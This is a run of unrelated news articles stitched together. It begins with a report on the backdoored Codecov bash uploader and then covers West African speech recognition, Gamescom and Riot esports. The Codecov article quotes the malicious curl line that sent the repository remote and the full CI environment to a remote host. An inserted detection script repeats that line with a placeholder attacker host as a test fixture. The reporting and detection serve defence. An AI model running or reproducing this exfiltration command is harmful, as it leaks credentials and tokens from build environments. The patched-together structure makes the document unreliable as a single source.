Backdoored developer tool that stole credentials escaped notice for 3 months


A publicly available software development tool contained malicious code that stole the authentication credentials that apps need to access sensitive resources. It’s the latest revelation of a supply chain attack that has the potential to backdoor the networks of countless organizations.

The Codecov bash uploader contained the backdoor from late January to the beginning of April, developers of the tool said on Thursday. The backdoor caused developer computers to send secret authentication tokens and other sensitive data to a remote site controlled by the hackers. The uploader works with development platforms including GitHub Actions, CircleCI, and Bitrise Step, all of which support having such secret authentication tokens in the development environment.

A pile of AWS and other cloud credentials

The Codecov bash uploader performs what is known as code coverage for large-scale software development projects. It allows developers to send coverage reports that, among other things, determine how much of a codebase has been tested by internal test scripts. Some development projects integrate Codecov and similar third-party services into their platforms, where there is free access to sensitive credentials that can be used to steal or modify source code.

Code similar to this single line first appeared on January 31:

curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https:///upload/v2 || true

The code sends both the GitHub repository location and the entire process environment to the remote site, which has been redacted because Codecov says it’s part of an ongoing federal investigation. These types of environments typically store tokens, credentials, and other secrets for software in Amazon Web Services or GitHub.

Armed with these secrets, there’s no shortage of malicious things an attacker could do to development environments that relied on the tool, said HD Moore, a security expert and the CEO of network discovery platform Rumble.

“It really depends on what was in the environment, but from the point that attackers had access (via the bash uploader), they might have been able to plant backdoors on the systems where it ran,” he wrote in a direct message with Ars. “For GitHub/CircleCI, this would have mostly exposed source code and credentials.”

Moore continued:

The attackers likely ended up with a pile of AWS and other cloud credentials in addition to tokens that could give them access to private repositories, which includes source code but also all the other stuff that the token was authorized for. On the extreme end, these credentials would be self-perpetuating—the attackers use a stolen GitHub token to backdoor the source code, which then steals downstream customer data, etc. The same could apply to AWS and other cloud credentials. If the credentials allowed for it, they could enable infrastructure takeover, database access, file access, etc.

In Thursday’s advisory, Codecov said the malicious version of the bash uploader could access:

  • Any credentials, tokens, or keys that our customers were passing through their CI (continuous integration) runner that would be accessible when the bash uploader script was executed
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys
  • The git remote information (URL of the origin repository) of repositories using the bash uploaders to upload coverage to Codecov in CI

“Based upon the forensic investigation results to date, it appears that there was periodic unauthorized access to a Google Cloud Storage (GCS) key beginning January 31, 2021, which allowed a malicious third-party to alter a version of our bash uploader script to potentially export information subject to continuous integration to a third-party server,” Codecov said. “Codecov secured and remediated the script April 1, 2021.”

The Codecov advisory said that a bug in Codecov’s Docker image-creation process allowed the hacker to extract the credential required to modify the bash uploader script.

The tampering was discovered on April 1 by a customer who noticed that the shasum that acts as a digital fingerprint to confirm the integrity of bash uploader didn’t match the shasum for the version downloaded from https://codecov.io/bash. The customer contacted Codecov, and the tool maker pulled the malicious version and started an investigation.

Codecov is urging anyone who used the bash uploader during the affected period to revoke all credentials, tokens, or keys located in CI processes and create new ones. Developers can determine what keys and tokens are stored in a CI environment by running the env command in the CI pipeline. Anything sensitive should be considered compromised.

Additionally, anyone who uses a locally stored version of the bash uploader should check it for the following:

curl -sm 0.5 -d "$(git remote -v)

If this command appears anywhere in a locally stored bash uploader, users should immediately replace the uploader with the most recent version from https://codecov.io/bash.

Codecov said that developers using a self-hosted version of the bash uploader are unlikely to be affected. “To be impacted, your CI pipeline would need to be fetching the bash uploader from https://codecov.io/bash instead of from your self-hosted Codecov installation. You can verify from where you are fetching the bash uploader by looking at your CI pipeline configuration,” the company said.

The appeal of supply chain attacks

The compromise of Codecov’s software development and distribution system is the latest supply chain attack to come to light. In December, a similar compromise hit SolarWinds, the Austin, Texas maker of network management tools used by about 300,000 organizations around the world, including Fortune 500 companies and government agencies.

The hackers who carried out the breach then distributed a backdoored update that was downloaded by about 18,000 customers. About 10 US federal agencies and 100 private companies eventually received follow-on payloads that sent sensitive information to attacker-controlled servers. FireEye, Microsoft, Mimecast, and Malwarebytes were all swept up in the campaign.

More recently, hackers carried out a software supply chain attack that was used to install surveillance malware on the computers of people using NoxPlayer, a software package that emulates the Android operating system on PCs and Macs, mainly so users can play mobile games on those platforms. A backdoored version of NoxPlayer was available for five months, researchers from ESET said.

The appeal of supply chain attacks to hackers is their breadth and effectiveness. By compromising a single player high in the software supply chain, hackers can potentially infect any person or organization who uses the compromised product. Another feature that hackers find beneficial: there’s often little or nothing targets can do to detect malicious software distributed this way because digital signatures will indicate that it’s legitimate.

In the case of the backdoored bash uploader version, however, it would have been easy for Codecov or any of its customers to detect the malice by doing nothing more than checking the shasum. The ability for the malicious version to escape notice for three months indicates that no one bothered to perform this simple check.
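As an added example (not Codecov's own code), the following POSIX shell gate combines the two checks the article describes: the checksum comparison that surfaced the tampering, and the scan of a locally stored uploader for the injected line. The expected digest, the two fixture scripts and the remote host name are constructed stand-ins.

```shell
#!/bin/sh
# Added example, not Codecov's code: gate a locally stored bash uploader
# before CI runs it.
#  1. Its SHA-256 must equal a digest obtained out of band (stand-in here),
#     the comparison that exposed the tampering.
#  2. It must not contain the exfiltration line named in the advisory.
set -u

# Opening characters of the injected line, as given in the advisory.
INDICATOR='curl -sm 0.5 -d "$(git remote -v)'

# Hex SHA-256 digest of file $1; works with coreutils or BSD/macOS tools.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d ' ' -f1
    else
        shasum -a 256 "$1" | cut -d ' ' -f1
    fi
}

# Exit status 0 if the file contains the indicator string.
uploader_is_tampered() {
    grep -qF -- "$INDICATOR" "$1"
}

# Exit status 0 only if the digest of $1 equals $2 and no indicator is present.
verify_uploader() {
    file=$1
    expected=$2
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "REJECT $file: sha256 $actual != expected $expected" >&2
        return 1
    fi
    if uploader_is_tampered "$file"; then
        echo "REJECT $file: exfiltration indicator found" >&2
        return 1
    fi
    echo "OK $file"
}

# Constructed fixtures: a harmless stand-in for a clean uploader, and a copy
# with the injected line appended (remote host replaced by a placeholder).
WORK=$(mktemp -d)
CLEAN="$WORK/codecov-clean.sh"
TAMPERED="$WORK/codecov-tampered.sh"
cat > "$CLEAN" <<'EOF'
#!/usr/bin/env bash
# constructed stand-in for the real uploader; does no network I/O
echo "uploading coverage report"
EOF
cp "$CLEAN" "$TAMPERED"
cat >> "$TAMPERED" <<'EOF'
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://ATTACKER-HOST-REDACTED/upload/v2 || true
EOF
# Digest of the trusted copy stands in for one published out of band.
EXPECTED=$(sha256_of "$CLEAN")

verify_uploader "$CLEAN" "$EXPECTED"
verify_uploader "$TAMPERED" "$EXPECTED" || true
```

The fixtures are only hashed and grepped, never executed.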

People who have used the bash uploader between January 31 and April 1 should carefully inspect their development builds for signs of compromise by following the steps outlined in Thursday’s advisory.


Speech recognition system trains on radio archive to learn Niger Congo languages



For many of the 700 million illiterate people around the world, speech recognition technology could provide a bridge to valuable information. Yet in many countries, these people tend to speak only languages for which the datasets necessary to train a speech recognition model are scarce. This data deficit persists for several reasons, chief among them the fact that creating products for languages spoken by smaller populations can be less profitable.

Nonprofit efforts are underway to close the gap, including 1000 Words in 1000 Languages, Mozilla’s Common Voice, and the Masakhane project, which seeks to translate African languages using neural machine translation. But this week, researchers at Guinea-based tech accelerator GNCode and Stanford detailed a new initiative that uniquely advocates using radio archives in developing speech systems for “low-resource” languages, particularly Maninka, Pular, and Susu in the Niger Congo family.

“People who speak Niger Congo languages have among the lowest literacy rates in the world, and illiteracy rates are especially pronounced for women,” the coauthors note. “Maninka, Pular, and Susu are spoken by a combined 10 million people, primarily in seven African countries, including six where the majority of the adult population is illiterate.”

The idea behind the new initiative is to make use of unsupervised speech representation learning, demonstrating that representations learned from radio programs can be leveraged for speech recognition. Where labeled datasets don’t exist, unsupervised learning can help to fill in domain knowledge by determining the correlations between data points and then training based on the newly applied data labels.

New datasets

The researchers created two datasets, West African Speech Recognition Corpus and the West African Radio Corpus, intended for applications targeting West African languages. The West African Speech Recognition Corpus contains over 10,000 hours of recorded speech in French, Maninka, Susu, and Pular from roughly 49 speakers, including Guinean first names and voice commands like “update that,” “delete that,” “yes,” and “no.” As for the West African Radio Corpus, it consists of 17,000 audio clips sampled from archives collected from six Guinean radio stations. The broadcasts in the West African Radio Corpus span news and shows in languages including French, Guerze, Koniaka, Kissi, Kono, Maninka, Mano, Pular, Susu, and Toma.

To create a speech recognition system, the researchers tapped Facebook’s wav2vec, an open source framework for unsupervised speech processing. Wav2vec uses an encoder module that takes raw audio and outputs speech representations, which are fed into a Transformer that ensures the representations capture whole-audio-sequence information. Created by Google researchers in 2017, the Transformer network architecture was initially intended as a way to improve machine translation. To this end, it uses attention functions instead of a recurrent neural network to predict what comes next in a sequence.

Above: The accuracies of WAwav2vec.

Despite the fact that the radio dataset includes phone calls as well as background and foreground music, static, and interference, the researchers managed to train a wav2vec model with the West African Radio Corpus, which they call WAwav2vec. In one experiment with speech across French, Maninka, Pular, and Susu, the coauthors say that they achieved multilingual speech recognition accuracy (88.01%) on par with Facebook’s baseline wav2vec model (88.79%) — despite the fact that the baseline model was trained on 960 hours of speech versus WAwav2vec’s 142 hours.

Virtual assistant

As a proof of concept, the researchers used WAwav2vec to create a prototype of a speech assistant. The assistant — which is available in open source along with the datasets — can recognize basic contact management commands (e.g., “search,” “add,” “update,” and “delete”) in addition to names and digits. As the coauthors note, smartphone access has exploded in the Global South, with an estimated 24.5 million smartphone owners in South Africa alone, according to Statista, making this sort of assistant likely to be useful.

“To the best of our knowledge, the multilingual speech recognition models we trained are the first-ever to recognize speech in Maninka, Pular, and Susu. We also showed how this model can power a voice interface for contact management,” the coauthors wrote. “Future work could expand its vocabulary to application domains such as microfinance, agriculture, or education. We also hope to expand its capabilities to more languages from the Niger-Congo family and beyond, so that literacy or ability to speak a foreign language are not prerequisites for accessing the benefits of technology. The abundance of radio data should make it straightforward to extend the encoder to other languages.”


Gamescom announces online-only festival in August, reversing hybrid event plan



Reversing a plan announced in March, Gamescom will no longer try to do a hybrid gaming expo this summer. Instead, it will focus on an online-only event at the end of August.

The fan-and-business trade show is the world’s biggest game-industry event — with 370,000 people attending the physical event in 2019 — but it had to switch to online-only in 2020 due to the pandemic. The event organizers floated the idea of a hybrid physical event where fans could come see games in person along with digital announcements. The hope was that the coronavirus would subside thanks to vaccinations and that people would want to recapture the excitement of an in-person event.

But today, the Association of the German Games Industry and Koelnmesse decided against that plan, based on responses from potential exhibitors and fans. They plan to hold the main part of the show from August 25 to August 29.

Gamescom Congress will once again take place Thursday, August 26, and Devcom will start off the events August 23. The main days of Gamescom will take place on August 26 and August 27. IGN will produce a show dubbed Awesome Indies. Opening Night Live, which Geoff Keighley produces, will still take place, but it will now be online-only as well. Gamescom was planning to start selling tickets in May.

Above: The crowd at Gamescom 2019 on opening day. The show was online-only in 2020. It will be online-only again in 2021.

Image Credit: Dean Takahashi

“This decision was made after extensive discussions with partners and exhibitors,” the organizers said in a press release. “Thus, the organizers take into account the current situation, in which too many companies are unable to participate in physical events this year due to the still difficult development. In this way, they also meet the partners’ strong need for planning security. This means that Gamescom 2021 will be held exclusively digitally and free of charge for all Gamescom fans.”

Last year, Gamescom had more than 100 million video views over all formats and channels, more than 50 million unique viewers from 180 countries, and 370 partners from 44 countries. Oliver Frese, chief operating officer of Koelnmesse, said in a statement that Gamescom was coming too early for many companies in the industry, as it required so much advanced planning amid an uncertain environment. Companies need that planning reliability, he said.

Felix Falk, managing director of the German Games Industry Association, said in a statement that next year the groups will be able to implement more of the concepts they had in mind for a hybrid version of Gamescom. There will be business-to-business matchmaking events such as “indies meet investors and publishers” pitch events.


Riot Games will launch Wild Rift esports tournament in late 2021



Riot Games will launch the League of Legends: Wild Rift esports tournament in late 2021.

The company hopes to apply the lessons of a decade of League of Legends esports to the mobile game. Riot Games wants to build a similar community for Wild Rift. It made the announcement this morning on the eve of the League of Legends Mid-Season Invitational tournament.

League of Legends: Wild Rift is a 5-on-5 multiplayer online battle arena (MOBA) experience of League of Legends, developed for console and mobile by Riot Games. Wild Rift brings League to new platforms, featuring competitive gameplay, a twin-stick control system, and a roster of over 60 champions to take to the Rift, with two more coming every month this year.

John Needham, the global head of esports at Riot Games, said in a statement that Riot believes mobile gaming will transform the future of esports. The company didn’t specify whether the Wild Rift esports tournament would be an in-person or digital event.

Needham also noted that regional teams will qualify for this tournament in the fourth quarter of the year.

A worldwide competition

Above: The stage for the Riot Games esports event.

Image Credit: Riot Games

Regional Wild Rift Esports competitions have already started around the world. Southeast Asia recently concluded the first official esports competition, the SEA Icon Series: Preseason. The five week-long event took place in multiple locations: Vietnam, Taiwan, Philippines, Thailand, Indonesia, Malaysia, and Singapore and featured 54 professional teams.

Leo Faria is global head of Wild Rift esports. He said in a statement that a number of esports organizations have announced their Wild Rift teams. In Southeast Asia, organizations like The Alliance, RRQ, and LoL Esports veterans Flash Wolves all announced Wild Rift rosters. More big names are coming, he said.

Faria said that a regional competition schedule, third-party tournament guidelines, and more information about the global event will be revealed later this year.

Other big events


Above: The Masters Trophy

Image Credit: Riot Games

Other events include the Valorant Stage 3 Masters event, which will increase in size with 16 teams in attendance. It will take place from September 9 to September 19. The winner of Masters: Berlin will automatically qualify into Valorant Champions where a single team will be crowned the best Valorant team of 2021. HyperX will sponsor that event as a keyboard and mouse partner. Other Riot partners include Spotify and Verizon. More than 2,000 teams have participated in qualifying events.

Cisco will be providing the network supporting MSI in Iceland and Riot Games’ production centers in Berlin and Los Angeles. For the first time, pro teams at MSI will be able to practice from the comfort of their hotel rooms on the same high-performance servers at ultra low ping.

Riot is also launching a new podcast that will be available exclusively on Spotify that will cover trending LoL Esports news from around the world. The episodes will be hosted by Riot Games personalities and will drop weekly throughout the year.
